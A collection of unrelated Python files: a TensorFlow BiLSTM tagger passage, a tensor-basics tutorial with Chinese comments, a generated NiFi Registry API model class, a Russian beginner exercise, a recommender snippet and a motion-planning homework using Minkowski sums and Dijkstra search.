state_keep_prob=1 - self.params['dropout'][1])
(output_fw, output_bw), _ = tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, merged,
dtype=tf.float64)
merged = tf.concat([output_fw, output_bw], axis=-1)
'''
merged_input = Bidirectional(LSTM(size, return_sequences=True, dropout=self.params['dropout'][0],
recurrent_dropout=self.params['dropout'][1]),
name='shared_varLSTM_' + str(cnt))(merged_input)
'''
else:
""" Naive dropout """
(output_fw, output_bw), _ = tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, merged,
dtype=tf.float64)
merged = tf.concat([output_fw, output_bw], axis=-1)
merged = tf.layers.Dropout(self.params['dropout'],
name='shared_dropout_'+ str(cnt))(merged)
'''
merged_input = Bidirectional(LSTM(size, return_sequences=True), name='shared_LSTM_' + str(cnt))(
merged_input)
if self.params['dropout'] > 0.0:
merged_input = TimeDistributed(Dropout(self.params['dropout']),
name='shared_dropout_' + str(self.params['dropout']) + "_" + str(
cnt))(merged_input)
'''
print(cnt, 'BiLSTM Shape:', merged.shape)
cnt += 1
merged = tf.reshape(merged, [-1, self.params['LSTM-Size'][-1]*2])
if self.params['classifier'].lower() == 'softmax':
merged = tf.layers.Dense(len(self.params['labelEntries']),
activation=self.activation_map['softmax'], name='output')(merged)
merged = tf.reshape(merged, [-1, merged_input_shape[-2], len(self.params['labelEntries'])])
loss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=label, logits=merged)
output = tf.argmax(merged, axis=-1, name="softmax_output")
'''
output = TimeDistributed(Dense(len(self.params['labelEntries']),
activation='softmax'), name='output')(merged_input)
lossFct = 'sparse_categorical_crossentropy'
acc = 'sparse_categorical_accuracy'
'''
elif self.params['classifier'].upper() == 'CRF':
merged = tf.layers.Dense(len(self.params['labelEntries']), name="hidden_lin_layer")(merged)
merged = tf.reshape(merged, [-1, merged_input_shape[-2], len(self.params['labelEntries'])])
merged = tf.cast(merged, tf.float32)
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(merged,
label, sentence_length)
loss = -log_likelihood
output, viterbi_score = tf.contrib.crf.crf_decode(merged, transition_params, sentence_length)
output = tf.identity(output, name="crf_output")
score = tf.identity(viterbi_score, name="score")
'''
output = TimeDistributed(Dense(len(self.params['labelEntries']), activation=None),
name='hidden_lin_layer')(merged_input)
crf = CRF(len(self.params['labelEntries']), learn_mode=self.params['crf']['learn-mode'],
test_mode=self.params['crf']['test-mode'], sparse_target=True, name='output')
output = crf(output)
lossFct = crf.loss_function
acc = crf.accuracy
'''
print('Output Shape:', output.shape)
lossFct = tf.reduce_mean(loss, name='loss')
precision = tf.metrics.precision(label, output, name='precision')
recall = tf.metrics.recall(label, output, name='recall')
optimizerParams = {k: v for k, v in self.params['optimizer'].items() if k not in ['type', 'clipnorm', 'clipvalue']}
#optimizerParams['name'] = 'train_op'
if self.params['optimizer']['type'].lower() == 'adam':
opt = tf.train.AdamOptimizer(**optimizerParams)
elif self.params['optimizer']['type'].lower() == 'nadam':
opt = tf.contrib.opt.NadamOptimizer(**optimizerParams)
elif self.params['optimizer']['type'].lower() == 'rmsprop':
opt = tf.train.RMSPropOptimizer(**optimizerParams)
elif self.params['optimizer']['type'].lower() == 'adadelta':
opt = tf.train.AdadeltaOptimizer(**optimizerParams)
elif self.params['optimizer']['type'].lower() == 'adagrad':
opt = tf.train.AdagradOptimizer(**optimizerParams)
elif self.params['optimizer']['type'].lower() == 'sgd':
opt = tf.train.GradientDescentOptimizer(**optimizerParams)
grad_vars = opt.compute_gradients(lossFct)
grad_vars = [
(tf.clip_by_norm(grad, self.params['optimizer']['clipnorm']), var)
if grad is not None else (grad, var)
for grad, var in grad_vars]
if abs(self.params['optimizer']['clipvalue']) > 0:
grad_vars = [
(tf.clip_by_value(grad, -abs(self.params['optimizer']['clipvalue']),
abs(self.params['optimizer']['clipvalue'])), var)
if grad is not None else (grad, var)
for grad, var in grad_vars]
opt.apply_gradients(grad_vars, name='train_op')
def printSummary(self):
pass
def setRawDataset(self, dataset):
self.dataEncoding(dataset['data'])
self.params['labelEntries'] = dataset['labelEntries']
self.dataset = dataset
self.datagenerator=self.dataGenerator()
def setDataset(self, dataset):
self.dataset = dataset
self.params['labelEntries'] = self.dataset['labelEntries']
self.datagenerator = self.dataGenerator()
def dataEncoding(self, data, inBatch=True, hasLabel=True):
# Encoding data
def getCasing(word):
"""Returns the casing for a word"""
casing = 'other'
numDigits = 0
numUpper = 0
for char in word:
if char.isdigit():
numDigits += 1
if char.isupper():
numUpper += 1
digitFraction = numDigits / float(len(word))
upperFraction = numUpper / float(len(word))
if word.isdigit(): # Is a digit
casing = 'numeric'
elif digitFraction > 0.5:
casing = 'mainly_numeric'
elif upperFraction > 0.5:
casing = 'mainly_allUpper'
elif word.islower(): # All lower case
casing = 'allLower'
elif word.isupper(): # All upper case
casing = 'allUpper'
elif word[0].isupper(): # is a title, initial char upper, then all lower
casing = 'initialUpper'
elif upperFraction > 0:
casing = 'contains_upper'
elif numDigits > 0:
casing = 'contains_digit'
return casing
def encode(array, anything2Idx):
encoded = [0 for _ in anything2Idx]
for _ in array:
encoded[_] = 1
return encoded
limit = (self.params['character']['maxCharLength'] - 2) // 2
casing2Idx = {v: k for k, v in enumerate(self.params['casingEntries'])}
pos2Idx = {v: k for k, v in enumerate(self.params['posEntries'])}
label2Idx = {v: k for k, v in enumerate(self.params['labelEntries'])}
groups = data
if not inBatch:
groups = [data]
for group in groups:
for sent in group:
for word in sent:
char = word.pop('surface') if 'surface' in word.keys() else word.pop('token')
surface = char
# Padding
if char == 'PADDING_TOKEN':
word['char'] = [self.char2Idx['PADDING']
for _ in range(self.params['character']['maxCharLength'])]
#word['casing'] = encode([casing2Idx['PADDING']], casing2Idx)
word['casing'] = casing2Idx['PADDING']
if 'tokens' in self.params['featureNames']:
word['lemma'] = self.word2Idx['PADDING_TOKEN']
word['pos'] = encode([pos2Idx['PADDING']], pos2Idx)
#word['label'] = encode([label2Idx[word['label']]], label2Idx)
word['label'] = [label2Idx[word['label']]]
continue
# Casing Encoding
# word['casing'] = encode([casing2Idx.get(getCasing(char), casing2Idx['other'])], casing2Idx)
word['casing'] = casing2Idx.get(getCasing(char), casing2Idx['other'])
# Char Encoding
if len(char) > self.params['character']['maxCharLength'] - 2:
char = char[:limit] + char[-limit:]
char = [self.char2Idx.get(_, self.char2Idx['UNKNOWN']) for _ in char]
char.insert(0, self.char2Idx['PADDING'])
char.extend([self.char2Idx['PADDING']
for _ in range(len(char), self.params['character']['maxCharLength'])])
word['char'] = char
# Lemma and POS Encoding
word['lemma'] = self.word2Idx.get(word.get('lemma')) or self.word2Idx['UNKNOWN_TOKEN']
analyses = word.pop('analyses')
if len(analyses) == 0:
if 'tokens' in self.params['featureNames']:
word['lemma'] = self.word2Idx.get(word.get('lemma')) or\
self.word2Idx.get(surface) or\
self.word2Idx['UNKNOWN_TOKEN']
word['pos'] = encode([pos2Idx['UNKNOWN']], pos2Idx)
else:
if 'tokens' in self.params['featureNames']:
lemmas = set([_[0].get('canon') or _[0]['base'] for _ in analyses])
if len(set([_.replace('+', '') for _ in lemmas])) > 1:
word['lemma'] = self.word2Idx['AMBIGUOUS_TOKEN']
else:
word['lemma'] = self.word2Idx['UNKNOWN_TOKEN']
for _ in lemmas:
lemma = _.replace('+', '|')
if lemma in self.word2Idx.keys():
word['lemma'] = self.word2Idx[lemma]
break
if word['lemma'] == self.word2Idx['UNKNOWN_TOKEN']:
for _ in lemmas:
lemma = _.replace('-', '|')
if lemma in self.word2Idx.keys():
word['lemma'] = self.word2Idx[lemma]
break
if word['lemma'] == self.word2Idx['UNKNOWN_TOKEN']:
for analysis in analyses:
if analysis[-1]['base'] in self.word2Idx.keys():
word['lemma'] = self.word2Idx[analysis[-1]['base']]
break
POS = set([pos2Idx.get(analysis[-1]['pos'], pos2Idx['other']) for analysis in analyses])
word['pos'] = encode(POS, pos2Idx)
# Label Encoding
# word['label'] = encode([label2Idx[word['label']]], label2Idx)
if hasLabel:
try:
word['label'] = [label2Idx[word['label']]]
except KeyError:
print(word['label'])
print('Label entries not matched with model')
return
def dataGenerator(self):
k = 0
i = 0
while True:
k = k % len(self.dataset['data'])
j = min(i + self.params['miniBatchSize'], len(self.dataset['data'][k]))
data = self.dataset['data'][k][i:j]
np.random.shuffle(data)
x = {}
if 'tokens' in self.params['featureNames']:
x['tokens_input:0'] = np.array([[_['lemma'] for _ in sent] for sent in data])
if 'character' in self.params['featureNames']:
x['chars_input:0'] = np.array([[_['char'] for _ in sent] for sent in data])
if 'pos' in self.params['featureNames']:
x['pos_input:0'] = np.array([[_['pos'] for _ in sent] for sent in data])
if 'casing' in self.params['featureNames']:
x['casing_input:0'] = np.array([[_['casing'] for _ in sent] for sent in data])
x.update({'label:0': np.array([[_['label'][0] for _ in sent] for sent in data])})
x.update({'sentence_length:0': np.array([len(sent) for sent in data])})
yield x
if j == len(self.dataset['data'][k]):
i = 0
k += 1
else:
i = j
def model_predict(self, dict):
if self.params['classifier'].lower() == 'softmax':
result = self.session.run('softmax_output:0', feed_dict=dict)
elif self.params['classifier'].upper() == 'CRF':
result, score = self.session.run(['crf_output:0', 'score:0'], feed_dict=dict)
return result
def fit(self):
if self.session is None:
self.session = tf.Session()
self.session.run(tf.global_variables_initializer())
self.session.run(tf.local_variables_initializer())
best_score = 0
score = 0
counter = 0
for epoch in range(self.params['epoch']):
progress = trange(self.dataset['num_sents'] // self.params['miniBatchSize'] + 1)
progress.set_description('Epoch '+str(epoch))
for _ in progress:
batch = next(self.datagenerator)
self.session.run('train_op', feed_dict=batch)
loss, precision, recall = self.session.run(['loss:0', 'precision/update_op:0', 'recall/update_op:0'],
feed_dict=batch)
if precision == 0 and recall == 0:
score = 0
else:
score = 2 * precision * recall / (precision + recall)
progress.set_postfix_str(
f'loss: %f, prec: %f, rec: %f, f1-score: %f' % (loss, precision, recall, score))
# Early Stopping
if score > best_score + 0.001:
counter = 0
best_score = score
elif abs(best_score - score) < 0.001:
counter += 1
if counter > self.params['earlyStopping']:
print('Early Stopped')
break
def predict(self, tokens, toTag=False):
sents = []
for sent in tokens:
x = {}
if 'tokens' in self.params['featureNames']:
x['tokens_input:0'] = np.array([[_['lemma'] for _ in sent]])
if 'character' in self.params['featureNames']:
x['chars_input:0'] = np.array([[_['char'] for _ in sent]])
if 'pos' in self.params['featureNames']:
x['pos_input:0'] = np.array([[_['pos'] for _ in sent]])
if 'casing' in self.params['featureNames']:
x['casing_input:0'] = np.array([[_['casing'] for _ in sent]])
x.update({'sentence_length:0': np.array([len(sent)])})
y_pred = self.model_predict(x)[0]
if not toTag:
sents.append(y_pred)
else:
y_pred = [_.argmax(axis=-1) for _ in y_pred]
sents.append([self.params['labelEntries'][_] for _ in y_pred])
return sents
def evaluate(self, dataset, sortedBySize=False):
y_true = [w['label'][0] for g in dataset['data'] for s in g for w in s]
if sortedBySize:
data = dataset['data']
y_pred = []
for g in data:
x = {}
if 'tokens' in self.params['featureNames']:
x['tokens_input:0'] = np.array([[_['lemma'] for _ in sent] for sent in g])
if 'character' in self.params['featureNames']:
x['chars_input:0'] = np.array([[_['char'] for _ in sent] for sent in g])
if 'pos' in self.params['featureNames']:
x['pos_input:0'] = np.array([[_['pos'] for _ in sent] for sent in g])
if 'casing' in self.params['featureNames']:
x['casing_input:0'] = np.array([[_['casing'] for _ in sent] for sent in g])
x.update({'sentence_length:0': np.array([len(sent) for sent in g])})
y_g_pred = self.model_predict(x)
y_pred.extend([pred.argmax() for sent in y_g_pred for pred in sent])
else:
y_pred = [w.argmax() for g in dataset['data'] for s in self.predict(g) for w in s]
validLabels = [_ for _ in self.params['labelEntries'] if _ != 'O']
print(classification_report(y_true, y_pred, labels=[_ for _ in range(len(validLabels))],
target_names=validLabels))
def saveModel(self, path=None, initial_save=False, global_step=None):
import json, h5py
directory = path or self.params['modelSavePath']
self.params['modelSavePath'] = directory
if not os.path.exists(directory):
os.makedirs(directory)
tf.train.Saver().save(self.session, os.path.join(directory, 'model'),
global_step=global_step, write_meta_graph=initial_save)
#self.model.save(os.path.join(directory, 'model.h5'), True)
with h5py.File(os.path.join(directory, 'config.h5'), 'w') as f:
f.attrs['params'] = json.dumps(self.params)
f.attrs['word2Idx'] = json.dumps(self.word2Idx)
@staticmethod
def loadModel(path='bilstm-fin-ner'):
import tensorflow as tf
import json, h5py, os, sys
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
with h5py.File(os.path.join(path, 'config.h5'), 'r') as f:
params = json.loads(f.attrs['params'])
word2Idx = json.loads(f.attrs['word2Idx'])
params['modelSavePath'] = path
model = BiLSTM(params=params, word2Idx=word2Idx)
model.session = tf.Session()
saved_model = tf.train.import_meta_graph(os.path.join(path, 'model.meta'))
saved_model.restore(model.session, tf.train.latest_checkpoint(path))
#model.model = keras.models.load_model(os.path.join(path, 'model.h5'), custom_objects=create_custom_objects())
return model
if __name__ == '__main__':
import pickle
# from BiLSTM import BiLSTM
sample = pickle.load(open('finnish_sample.pkl', 'rb'))
model = BiLSTM(raw_dataset=sample)
model.fit()
#model.saveModel(path='test', initial_save=True) |
import main.core.similarity as sim
from main.info import config
config.Config().configdict['user_item_CF']['model'] = 'item-based'
config.Config().configdict['user_item_CF']['similarity'] = 'adjusted_cos'
config.Config().apply_changes()
dao = sim.new_DAO_interface()
sim.init_user_mean_matrix(dao)
sim.get_other_item_sim(313,dao)[:100]
config.Config().configdict['user_item_CF']['similarity'] = 'cos'
config.Config().apply_changes()
print ""
sim.get_other_item_sim(313,dao)[:100]
|
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers, optimizers, datasets
a = tf.constant(1) # 标量
print(a.device) # 运行设备:CPU/GUP
b = tf.range(4)
print(b)
print(b.device)
print(b.numpy())
print(b.ndim) # 维度
print(tf.rank(b)) # 维度(Tensor变量表示)
print(tf.ones([3,4,2])) # 3维数组
print(tf.ones([3,4,2]).ndim, tf.rank(tf.ones([3,4,2]))) # 维度
# In[]:
a = tf.constant([1., 2.]) # 标量
b = tf.constant([True, False])
c = tf.constant('hello world')
d = np.arange(4)
print(isinstance(a, tf.Tensor)) # 不推荐使用
print(tf.is_tensor(b)) # 数据类型判断
print(tf.is_tensor(d))
print(a.dtype, b.dtype, c.dtype, d.dtype)
print(a.dtype == tf.float32, c.dtype == tf.string)
# In[]:
a = np.arange(5)
print(a.dtype)
aa = tf.convert_to_tensor(a, dtype=tf.int32)
print(aa.dtype, tf.is_tensor(aa))
# In[]:
# 数据类型转换
b = tf.cast(aa, dtype=tf.float32)
aaa = tf.cast(aa, dtype=tf.double)
print(aaa)
print(tf.cast(aaa, dtype=tf.int32))
b = tf.constant([0,1])
bb = tf.cast(b, dtype=tf.bool)
print(bb)
print(tf.cast(bb, dtype=tf.int32))
# In[]:
# 梯度求导变量: tf.Variable
a = tf.range(5) # Tensor 转 Variable
b = tf.Variable(a, name="input_data")
print(b.dtype, b.name, b.trainable) # 自动记录梯度信息
print(isinstance(b, tf.Tensor)) # 错误判断,不推荐使用isinstance
print(isinstance(b, tf.Variable))
print(tf.is_tensor(b))
c = np.arange(5) # Numpy 转 Variable
d = tf.Variable(c, name="input_data")
print(d.dtype, d.name, d.trainable) # 自动记录梯度信息
print(isinstance(d, tf.Tensor)) # 错误判断,不推荐使用isinstance
print(isinstance(d, tf.Variable))
print(tf.is_tensor(d))
print(b.numpy())
print(d.numpy())
a = tf.ones([])
print(a, a.numpy())
print(int(a), float(a)) # 直接转换,a必须为标量
# In[]:
print(tf.convert_to_tensor(np.ones([2,3,3])))
print(tf.convert_to_tensor([1, 2.])) # 数据类型自动升级为float32
print(tf.convert_to_tensor([[1], [2.]]))
print("-"*30)
print(tf.zeros([]))
print(tf.zeros([1]))
print(tf.zeros([1,2]))
print(tf.zeros([2,3,3]))
# In[]:
a = tf.zeros([2,3,3])
print(tf.zeros_like(a)) # 相同
print(tf.zeros(a.shape))
print("-"*30)
print(tf.ones(1))
print(tf.ones([]))
print(tf.ones([2]))
print(tf.ones([2,3]))
print(tf.ones_like(a))
# In[]:
print(tf.fill([2,2], 0))
print(tf.fill([2,2], 9.0))
# In[]:
print(tf.random.normal([2,2], mean=1, stddev=1)) # 正太分布
print(tf.random.truncated_normal([2,2], mean=0, stddev=1)) # 截断正太分布
print(tf.random.uniform([3,4], minval=0, maxval=1, dtype=tf.float32)) # 均匀分布
# In[]:
idx = tf.range(10)
idx = tf.random.shuffle(idx)
a = tf.random.normal([10, 784], mean=0, stddev=1)
b = tf.random.uniform([10], maxval=10, dtype=tf.int32)
# tf.gather:用一个一维的索引数组,将张量中对应索引的向量提取出来
a = tf.gather(a, idx)
b = tf.gather(b, idx)
print(a)
print(b)
# In[]:
# tf.convert_to_tensor 和 tf.constant 功能是重合的
a = tf.constant(1)
print(a)
b = tf.constant([1])
print(b)
c = tf.constant([[1,2,3],[4,5,6]])
print(c)
print("-"*30)
print(tf.convert_to_tensor(1))
print(tf.convert_to_tensor([1])) # 数据类型自动升级为float32
print(tf.convert_to_tensor([[1,2,3],[4,5,6]]))
# In[]:
out = tf.random.uniform([2, 3], seed=1)
print(out)
y = tf.range(2)
y = tf.one_hot(y, depth=3)
print(y)
loss = tf.keras.losses.mse(y, out) # mse是均方差; rmse才是均方根。
print(loss)
loss = tf.reduce_mean(loss) # 求平均
print(loss)
print("--------------------------------------------------------------------")
# 1、直接一步求
loss = tf.reduce_mean(tf.square(y - out)) # 直接求2次平均(最小二乘)
print(loss)
# 2、分开2步求:
loss = tf.reduce_mean(tf.square(y - out), axis=1)
loss = tf.reduce_mean(loss, axis=0)
print(loss)
# 3、分开2步求:
loss = tf.reduce_sum(tf.square(y - out), axis=1) / y.shape[1]
loss = tf.reduce_sum(loss) / y.shape[0]
print(loss)
# In[]:
'''
#这里有坑:
#1、layers.Dense(10)是指输出的列个数为10,由于输入x是4:8的,又由于使用的是x * w = x(4:8) * w(?:10),那么w的行个数就为8。
#2、bias就是偏移量b,维度为10。
'''
net = layers.Dense(10)
net.build((4, 8)) # 输入shape
print(net.kernel)
print(net.bias)
# In[]:
x = tf.random.normal([4, 784])
net = layers.Dense(10) # 全连接层
net.build((4, 784)) # 输入
print(net(x).shape) # 输出
print(net.kernel.shape) # 隐藏层
print(net.bias.shape) # 偏移项
# In[]:
#(x_train, y_train), (x_test, y_test) = datasets.imdb.load_data(num_words=10000)
#x_train = keras.preprocessing.sequence.pad_sequences(x_train, maxlen=80) # 每个评论80个单词
#print(x_train.shape)
#
#emb = embedding(x_train)
#print(emb.shape)
#
#out = rnn(emb[:4])
#print(out.shape)
|
# coding: utf-8
"""
Apache NiFi Registry REST API
The REST API provides an interface to a registry with operations for saving, versioning, reading NiFi flows and components.
OpenAPI spec version: 1.19.0
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class AccessPolicy(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'identifier': 'str',
'resource': 'str',
'action': 'str',
'configurable': 'bool',
'revision': 'RevisionInfo',
'users': 'list[Tenant]',
'user_groups': 'list[Tenant]'
}
attribute_map = {
'identifier': 'identifier',
'resource': 'resource',
'action': 'action',
'configurable': 'configurable',
'revision': 'revision',
'users': 'users',
'user_groups': 'userGroups'
}
def __init__(self, identifier=None, resource=None, action=None, configurable=None, revision=None, users=None, user_groups=None):
"""
AccessPolicy - a model defined in Swagger
"""
self._identifier = None
self._resource = None
self._action = None
self._configurable = None
self._revision = None
self._users = None
self._user_groups = None
if identifier is not None:
self.identifier = identifier
self.resource = resource
self.action = action
if configurable is not None:
self.configurable = configurable
if revision is not None:
self.revision = revision
if users is not None:
self.users = users
if user_groups is not None:
self.user_groups = user_groups
@property
def identifier(self):
"""
Gets the identifier of this AccessPolicy.
The id of the policy. Set by server at creation time.
:return: The identifier of this AccessPolicy.
:rtype: str
"""
return self._identifier
@identifier.setter
def identifier(self, identifier):
"""
Sets the identifier of this AccessPolicy.
The id of the policy. Set by server at creation time.
:param identifier: The identifier of this AccessPolicy.
:type: str
"""
self._identifier = identifier
@property
def resource(self):
"""
Gets the resource of this AccessPolicy.
The resource for this access policy.
:return: The resource of this AccessPolicy.
:rtype: str
"""
return self._resource
@resource.setter
def resource(self, resource):
"""
Sets the resource of this AccessPolicy.
The resource for this access policy.
:param resource: The resource of this AccessPolicy.
:type: str
"""
if resource is None:
raise ValueError("Invalid value for `resource`, must not be `None`")
self._resource = resource
@property
def action(self):
"""
Gets the action of this AccessPolicy.
The action associated with this access policy.
:return: The action of this AccessPolicy.
:rtype: str
"""
return self._action
@action.setter
def action(self, action):
"""
Sets the action of this AccessPolicy.
The action associated with this access policy.
:param action: The action of this AccessPolicy.
:type: str
"""
if action is None:
raise ValueError("Invalid value for `action`, must not be `None`")
allowed_values = ["read", "write", "delete"]
if action not in allowed_values:
raise ValueError(
"Invalid value for `action` ({0}), must be one of {1}"
.format(action, allowed_values)
)
self._action = action
@property
def configurable(self):
"""
Gets the configurable of this AccessPolicy.
Indicates if this access policy is configurable, based on which Authorizer has been configured to manage it.
:return: The configurable of this AccessPolicy.
:rtype: bool
"""
return self._configurable
@configurable.setter
def configurable(self, configurable):
"""
Sets the configurable of this AccessPolicy.
Indicates if this access policy is configurable, based on which Authorizer has been configured to manage it.
:param configurable: The configurable of this AccessPolicy.
:type: bool
"""
self._configurable = configurable
@property
def revision(self):
"""
Gets the revision of this AccessPolicy.
The revision of this entity used for optimistic-locking during updates.
:return: The revision of this AccessPolicy.
:rtype: RevisionInfo
"""
return self._revision
@revision.setter
def revision(self, revision):
"""
Sets the revision of this AccessPolicy.
The revision of this entity used for optimistic-locking during updates.
:param revision: The revision of this AccessPolicy.
:type: RevisionInfo
"""
self._revision = revision
@property
def users(self):
"""
Gets the users of this AccessPolicy.
The set of user IDs associated with this access policy.
:return: The users of this AccessPolicy.
:rtype: list[Tenant]
"""
return self._users
@users.setter
def users(self, users):
"""
Sets the users of this AccessPolicy.
The set of user IDs associated with this access policy.
:param users: The users of this AccessPolicy.
:type: list[Tenant]
"""
self._users = users
@property
def user_groups(self):
"""
Gets the user_groups of this AccessPolicy.
The set of user group IDs associated with this access policy.
:return: The user_groups of this AccessPolicy.
:rtype: list[Tenant]
"""
return self._user_groups
@user_groups.setter
def user_groups(self, user_groups):
"""
Sets the user_groups of this AccessPolicy.
The set of user group IDs associated with this access policy.
:param user_groups: The user_groups of this AccessPolicy.
:type: list[Tenant]
"""
self._user_groups = user_groups
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, AccessPolicy):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
# Задача 3. Вариант 6.
# Напишите программу, которая выводит имя "Самюэл Ленгхорн Клеменс", и запрашивает его псевдоним. Программа должна сцеплять две эти строки и выводить полученную строку, разделяя имя и псевдоним с помощью тире.
# Ivanov S. E.
# 19.09.2016
PSEUDONYM = "Марк Твен"
NAME = "Самюэл Ленгхорн Клеменс"
print("Герой нашей сегодняшней программы - %s" % NAME)
answer = input("Под каким же именем мы знаем этого человека? Ваш ответ: ")
if answer == PSEUDONYM:
print("Всё верно: {} - {}".format(NAME, PSEUDONYM))
else:
print("Неверный ответ")
input("\nНажмите Enter для выхода.")
|
import argparse
import os
from typing import List, Tuple, Dict
from Plotter import Plotter
from shapely.geometry.polygon import Polygon, LineString, orient
from shapely.geometry import Point
from math import atan2
from math import pi
import numpy as np
###########################################
# Algorithmic Motion Planning (236610) ##
# John Noonan and Eli Shafer ##
# Homework 1 ##
# November 2019 ##
###########################################
def get_minkowsky_sum(original_shape: Polygon, r: float) -> Polygon:
"""
Get the polygon representing the Minkowsky sum
:param original_shape: The original obstacle
:param r: The radius of the rhombus
:return: The polygon composed from the Minkowsky sums
"""
# Reorient the polygon so that vertices are in counter-clockwise direction
original_shape = orient(original_shape, sign=1.0)
obstacle = np.array(original_shape.exterior.coords)
obstacle = np.append(obstacle[:-1], obstacle[:2], 0)
robot = np.array([(0, -r), (r, 0), (0, r), (-r, 0), (0, -r), (r, 0)])
m = len(obstacle) - 2
n = 4
poly_sum = []
i = 0
j = 0
while i < n or j < m:
poly_sum.append(robot[i] + obstacle[j])
robot_diff = robot[i + 1] - robot[i]
obstacle_diff = obstacle[j + 1] - obstacle[j]
angle_robot = atan2(robot_diff[1], robot_diff[0])
# Make sure all angles are positive
if angle_robot < 0:
angle_robot += 2 * pi
angle_obs = atan2(obstacle_diff[1], obstacle_diff[0])
if angle_obs < 0:
angle_obs += 2 * pi
# If we complete all vertices on the polygon, we have completed a revolution.
# All angles thereafter are the angle plus one revolution.
if i >= n:
angle_robot += 2 * pi
if j >= m:
angle_obs += 2 * pi
if angle_robot < angle_obs:
i += 1
elif angle_robot > angle_obs:
j += 1
else:
i += 1
j += 1
return Polygon(poly_sum)
def get_visibility_graph(obstacles: List[Polygon], source=None, dest=None) -> List[LineString]:
"""
Get The visibility graph of a given map
:param obstacles: A list of the obstacles in the map
:param source: The starting position of the robot. None for part 1.
:param dest: The destination of the query. None for part 1.
:return: A list of LineStrings holding the edges of the visibility graph
"""
vis_graph = []
# Create a list of all vertices of polygons
v_list = [vertex for obstacle in obstacles for vertex in obstacle.exterior.coords[:-1]]
if source is not None:
v_list.append(source)
if dest is not None:
v_list.append(dest)
# for each vertice connect to all other vertices and collision check
for i, v in enumerate(v_list):
for j, w in enumerate(v_list[i + 1:]):
crosses = False
line = LineString([v, w])
for obstacle in obstacles:
if line.within(obstacle) or line.crosses(obstacle):
crosses = True
break
if not crosses:
vis_graph.append(line)
return vis_graph
def get_adjacency_list(lines: List[LineString]) -> Dict[Tuple, List[Tuple]]:
"""
Creates an Adjacency List from the list of edges in the visibility graph.
"""
adjacency_list = {}
for line in lines:
try:
adjacency_list[line.coords[0]].append(line.coords[1])
except:
adjacency_list[line.coords[0]] = [line.coords[1]]
try:
adjacency_list[line.coords[1]].append(line.coords[0])
except:
adjacency_list[line.coords[1]] = [line.coords[0]]
return adjacency_list
def construct_path(parent_map: Dict[Tuple, Tuple], goal: Tuple) -> List[Tuple]:
"""
Constructs the path from the goal node to the start node. The start node is
known due to its parent being None.
"""
path_node = goal
path = []
while path_node:
path.append(path_node)
path_node = parent_map[path_node]
path.reverse()
return path
def dijkstra(lines: List[LineString], start: Tuple, goal: Tuple) -> Tuple[List[Tuple], float]:
"""
Performs Dijkstra's Algorithm
"""
adjacency_list = get_adjacency_list(lines)
cost_map, parent_map = {}, {}
unvisited = set(adjacency_list.keys())
for node in unvisited:
cost_map[node] = 0.0 if node == start else float('inf')
parent_map[node] = None
while unvisited:
curr_node = min(unvisited, key = lambda node: cost_map[node])
curr_cost = cost_map[curr_node]
unvisited.remove(curr_node)
adj_nodes = adjacency_list[curr_node]
for adj_node in adj_nodes:
cost_curr_adj = curr_cost + float(np.linalg.norm(np.array(curr_node) - np.array(adj_node)))
prev_cost = cost_map[adj_node]
if (cost_curr_adj < prev_cost):
cost_map[adj_node] = cost_curr_adj
parent_map[adj_node] = curr_node
if curr_node == goal:
break
return construct_path(parent_map, goal), cost_map[goal]
def is_valid_file(parser, arg):
if not os.path.exists(arg):
parser.error("The file %s does not exist!" % arg)
def get_points_and_dist(line):
source, dist = line.split(' ')
dist = float(dist)
source = tuple(map(float, source.split(',')))
return source, dist
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("Robot",
help="A file that holds the starting position of the robot, and the distance from the center of the robot to any of its vertices")
parser.add_argument("Obstacles", help="A file that contains the obstacles in the map")
parser.add_argument("Query", help="A file that contains the ending position for the robot.")
args = parser.parse_args()
obstacles = args.Obstacles
robot = args.Robot
query = args.Query
is_valid_file(parser, obstacles)
is_valid_file(parser, robot)
is_valid_file(parser, query)
workspace_obstacles = []
with open(obstacles, 'r') as f:
for line in f.readlines():
points = [tuple(map(float, t.split(','))) for t in line.replace('\n', '').split(' ') if t != '']
# Ensure that the first vertex is one which has the minimum y-coordinate
min_y_ind = np.array(points).argmin(0)[1]
points = points[min_y_ind:] + points[:min_y_ind]
workspace_obstacles.append(Polygon(points))
with open(robot, 'r') as f:
source, dist = get_points_and_dist(f.readline())
# step 1:
c_space_obstacles = [get_minkowsky_sum(p, dist) for p in workspace_obstacles]
plotter1 = Plotter()
plotter1.add_obstacles(workspace_obstacles)
plotter1.add_c_space_obstacles(c_space_obstacles)
plotter1.add_robot(source, dist)
plotter1.show_graph()
# step 2:
lines = get_visibility_graph(c_space_obstacles)
plotter2 = Plotter()
plotter2.add_obstacles(workspace_obstacles)
plotter2.add_c_space_obstacles(c_space_obstacles)
plotter2.add_visibility_graph(lines)
plotter2.add_robot(source, dist)
plotter2.show_graph()
# step 3:
with open(query, 'r') as f:
dest = tuple(map(float, f.readline().split(',')))
lines = get_visibility_graph(c_space_obstacles, source, dest)
shortest_path, cost = dijkstra(lines, source, dest)
